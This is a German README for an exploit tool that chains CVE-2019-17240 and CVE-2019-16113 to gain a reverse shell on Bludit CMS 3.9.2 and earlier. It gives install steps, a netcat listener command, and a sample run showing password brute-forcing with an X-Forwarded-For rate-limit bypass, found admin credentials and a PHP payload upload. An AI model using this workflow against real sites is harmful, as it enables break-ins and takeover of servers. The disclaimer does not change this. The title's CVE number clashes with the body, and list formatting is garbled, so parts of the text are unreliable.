
cve-2016-16113
_ _____ ___ _
__| |___ /_ ___ __ / _ \ _ __ ___ (_)
/ _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
\__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|
Ein automatisiertes Exploitation-Tool, das CVE-2019-17240 (Authentication Bypass) und CVE-2019-16113 (Arbitrary File Upload) kombiniert, um Remote-Code-Ausführung auf angreifbaren Bludit CMS-Installationen zu erreichen.
NUR FÜR AUTORISIERTE SICHERHEITSTESTS
Dieses Tool ist für Sicherheitsexperten bestimmt, die autorisierte Penetrationstests durchführen, und für Sicherheitsforscher, die sich innerhalb der gesetzlichen Grenzen bewegen. Unautorisierter Zugriff auf Computersysteme ist illegal nach Gesetzen wie dem Computer Fraud and Abuse Act (CFAA) in den USA und ähnlichen Gesetzen weltweit.
Durch die Nutzung dieses Tools erklären Sie sich damit einverstanden:
Der Autor übernimmt keine Haftung und ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Dieses Exploit automatisiert folgende Schritte:
Betroffene Versionen: Bludit CMS Versionen 3.9.2 und niedriger
requests# Repository klonen
git clone https://github.com/yourusername/get-rce.git
cd get-rce
# Abhängigkeiten installieren
pip install -r requirements.txt
requirements.txt:
requests>=2.25.0
python3 get_rce.py
Das Skript fordert Sie auf:
https://target.com)Starten Sie vor dem Ausführen des Exploits einen netcat-Listener:
nc -lvnp 4444
Ersetzen Sie 4444 durch den von Ihnen gewählten Port.
$ python3 get_rce.py
Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...
[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username):
[...] We are gonna default to 'admin' as username.
[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)
[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt
SecLists: https://github.com/danielmiessler/SecLists
SecLists/Usernames/Names/names.txtSecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txtRockYou: /usr/share/wordlists/rockyou.txt (Kali Linux)
X-Forwarded-For-Header, um die Ratenbegrenzung zu umgehen/bl-content/tmp/ hoch.htaccess-Datei hoch, um die Ausführung sicherzustellenFalls Sie Systemadministrator sind:
/bl-content/tmp/ auf verdächtige DateienProblem: "The target seems to be down"
Problem: "Login failed"
Problem: "No shell received"
d3vn0mi
Dieses Projekt wird nur zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Siehe den Haftungsausschluss am Anfang dieser README.
Beiträge, Probleme und Funktionsanfragen sind willkommen! Besuchen Sie gerne die Issues-Seite.